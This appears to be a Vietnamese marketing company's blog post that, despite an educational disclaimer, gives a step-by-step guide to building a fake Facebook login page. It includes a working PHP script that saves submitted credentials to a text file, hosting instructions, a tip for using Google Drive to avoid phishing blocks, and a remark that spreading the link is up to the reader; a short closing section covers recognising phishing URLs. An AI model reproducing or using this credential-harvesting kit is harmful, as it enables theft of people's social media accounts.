Quy trình lên VIA Chạy VPCS
2020-02-09
2020-06-18
Phishing là gì?
Phishing là một kỹ thuật tạo một trang Đăng nhập giả giống trang thật, khi bạn hoặc ai khác đăng nhập vào trang đó, thông tin đăng nhập của bạn bị đánh cắp. Trong bài viết này mình sẽ cho bạn thấy làm thế nào để tạo ra các trang đăng nhập Facebook giả mạo đơn giản. Mục đích không phải hướng dẫn bạn thành kể xấu đi đánh cắp thông tin người khác, mà cho bạn thấy người ta tạo nó như thế nào, cách nhận diện và phòng tránh được trang web lừa đảo.
I – Tạo một trang web lừa đảo giống trang Facebook.
Để thực hiện điều này bạn cần tạo 3 file sau :
1) .html
2) .php
3) .txt
Bước 1:
Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình dùng facebook:
Click chuột fải và chọn xem nguồn trang ( view page source).
Xóa dòng đầu tiên là rồi save file notepad này lại thành "index.html". (Lưu tạm đó, bạn sẽ chỉnh sửa nó ở những bước tiếp theo.)
Code: header ('Location: https://www.facebook.com '); $handle = fopen("pass.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> |
Đến đây, chúng ta đã có 3 file cần thiết.
Bước 4: Tiếp theo các bạn upload 2 file là login.php và pass.txt vừa tạo ở bước 2 và bước 3 lên 1 webhosting nào đó.
Ở đây mình dùng host miễn phí là : http://www.byethost.com hoặc hosting nào cũng được.
Các bạn phải đang kí thì mới úp được.
Sau khi đăng kí xong bạn vào mục Online file manager, vào thư mục htdocs chọn upload và upload cả 2 file là login.php và pass.txt vừa tạo xong vào lên host.
Sau khi upload xong...File login.php của bạn sẽ có dạng
"www.username-của-bạn.byethost??.com/login.php"
"www.username-của-bạn.byethost??.com/pass.txt"
(“www.username-của-bạn.byethost??.com” phần này nhà cung cấp host có gửi mail cho bạn khi bạn đăng kí host.)
Bước 5:Upload file index.html bạn vừa tạo ở bước 1 lên Google Drive.
( Thông thường bạn upload cả 3 file lên host là ok nhưng Hiện tại một số host có khả năng nhận diện Phishing và Block tài khoản nào úp Phishing nên Google Drive là lựa chọn tốt nhất để tạo hosting chứa Phishing mà không bị block link.)
Trước khi upload bạn cần Chỉnh sửa file index.html ở bước 1 như sau:
- Mở file index.html bằng Notepad, ấn Ctrl + F trong notepad và tìm từ "action", sau nó có dòng: https://www.facebook.com/login.php?login_attempt=1&lwv=110
bạn hãy xóa toàn bộ nội dung trong dấu "ngoặc kép" và thay vào đó là "www.username-của-bạn.byethost??.com/login.php"
("www.username-của-bạn.byethost??.com/login.php" là tên miền chứa file login.php của host mà bạn upload nó ở trên.)
Tiếp theo, bạn vào google drive tạo một thư mục, ở đây tôi tạo tên thư mục là host.
Upload file index.html lên thư mục host của google drive.
Chia sẻ file bạn vừa Upload như sau:
Chú ý các kí tự trong giới hạn như hình ( ở đây màu đỏ).
Ví dụ: https://drive.google.com/file/d/0B7vTnwoYzqRlNS12LVZCOVlXZnM/view?usp=sharing
Copy lại và Pase nó sau https://googledrive.com/host/ thành
https://googledrive.com/host/0B7vTnwoYzqRlNS12LVZCOVlXZnM
Bước 5: Chép địa chỉ trên vào address của trinh duyệt của Chrome, Cốc Cốc, Firefox,… Để vào trang Fake của Facebook. Như vậy trang bạn vừa tạo giao diện không khác trang facebook.
Khi bạn điền thong tin và ấn đăng nhập, thông tin sẽ được chép vào file pass.txt mà bạn up trên host. Kiểm tra lại thì bạn vào file pass.txt truy cập nhanh bằng cách gõ:
www.username-của-bạn.byethost??.com/pass.txt vào trình duyệt Chome, Cốc Cốc, Firefox,...
Còn phát tán link web lừa đảo đến một ai đó là cách của bạn.
II – Cách nhận diện và phòng tránh trang lừa đảo Phishing.
Nhận diện trang lừa đảo đơn giản nhất là xem địa chỉ trang địa chỉ trên thanh Address của trình duyệt web.
Trang web lừa đảo thường có tên miền dài hoặc khác với tên miền trang thật. Một số có thể gần giống nhau chỉ khác nhau vài kí tự .
Đa số các trình duyệt web hiện nay điều có bảo mật nhận điện trang lừa đảo.
Khi bạn vào trang lừa đảo sẽ có thông báo như sau:
Nếu trình duyệt của bạn chưa bật bảo mật thì bật bảo mật.
Ví dụ trong Chrome vào Cài đặt: “chrome://settings” , chọn Hiển thị cài đặt nâng cao. Chọn “ Bảo vệ bạn và thiết bị khỏi trang web nguy hiểm”.
Chúc bạn lướt web an toàn!
Cám ơn các bạn đã đọc và theo dõi Nhân Việt Media & Education.
Tag liên quan: cách đọc dữ liệu phân tích quảng cáo, Quảng cáo Facebook hiệu quả . xác minh doanh nghiệp trên facebook,..
Xem thêm nhiều dịch vụ của chúng tôi tại đây
Xem thêm clip về marketing tại đây: youtube.com/@nhanvietmediaeducation
CÔNG TY TNHH TRUYỀN THÔNG & GIÁO DỤC NHÂN VIỆT
Trụ sở Hải Phòng: 20/222 Phố Trung Lăng - Khu 4 Thị Trấn Tiên Lãng - Huyện Tiên Lãng - Hải Phòng
Chi nhánh Hà Nội: 111 Ngõ Văn Chương, Phường Văn Chương, Q. Đống Đa, TP. Hà Nội
Hotline: 0964 639 819 - 0796 362 666
Email: [email protected]
Website: http://nhanvietmedia.com
Website: http://nhanvietmedia.edu.vn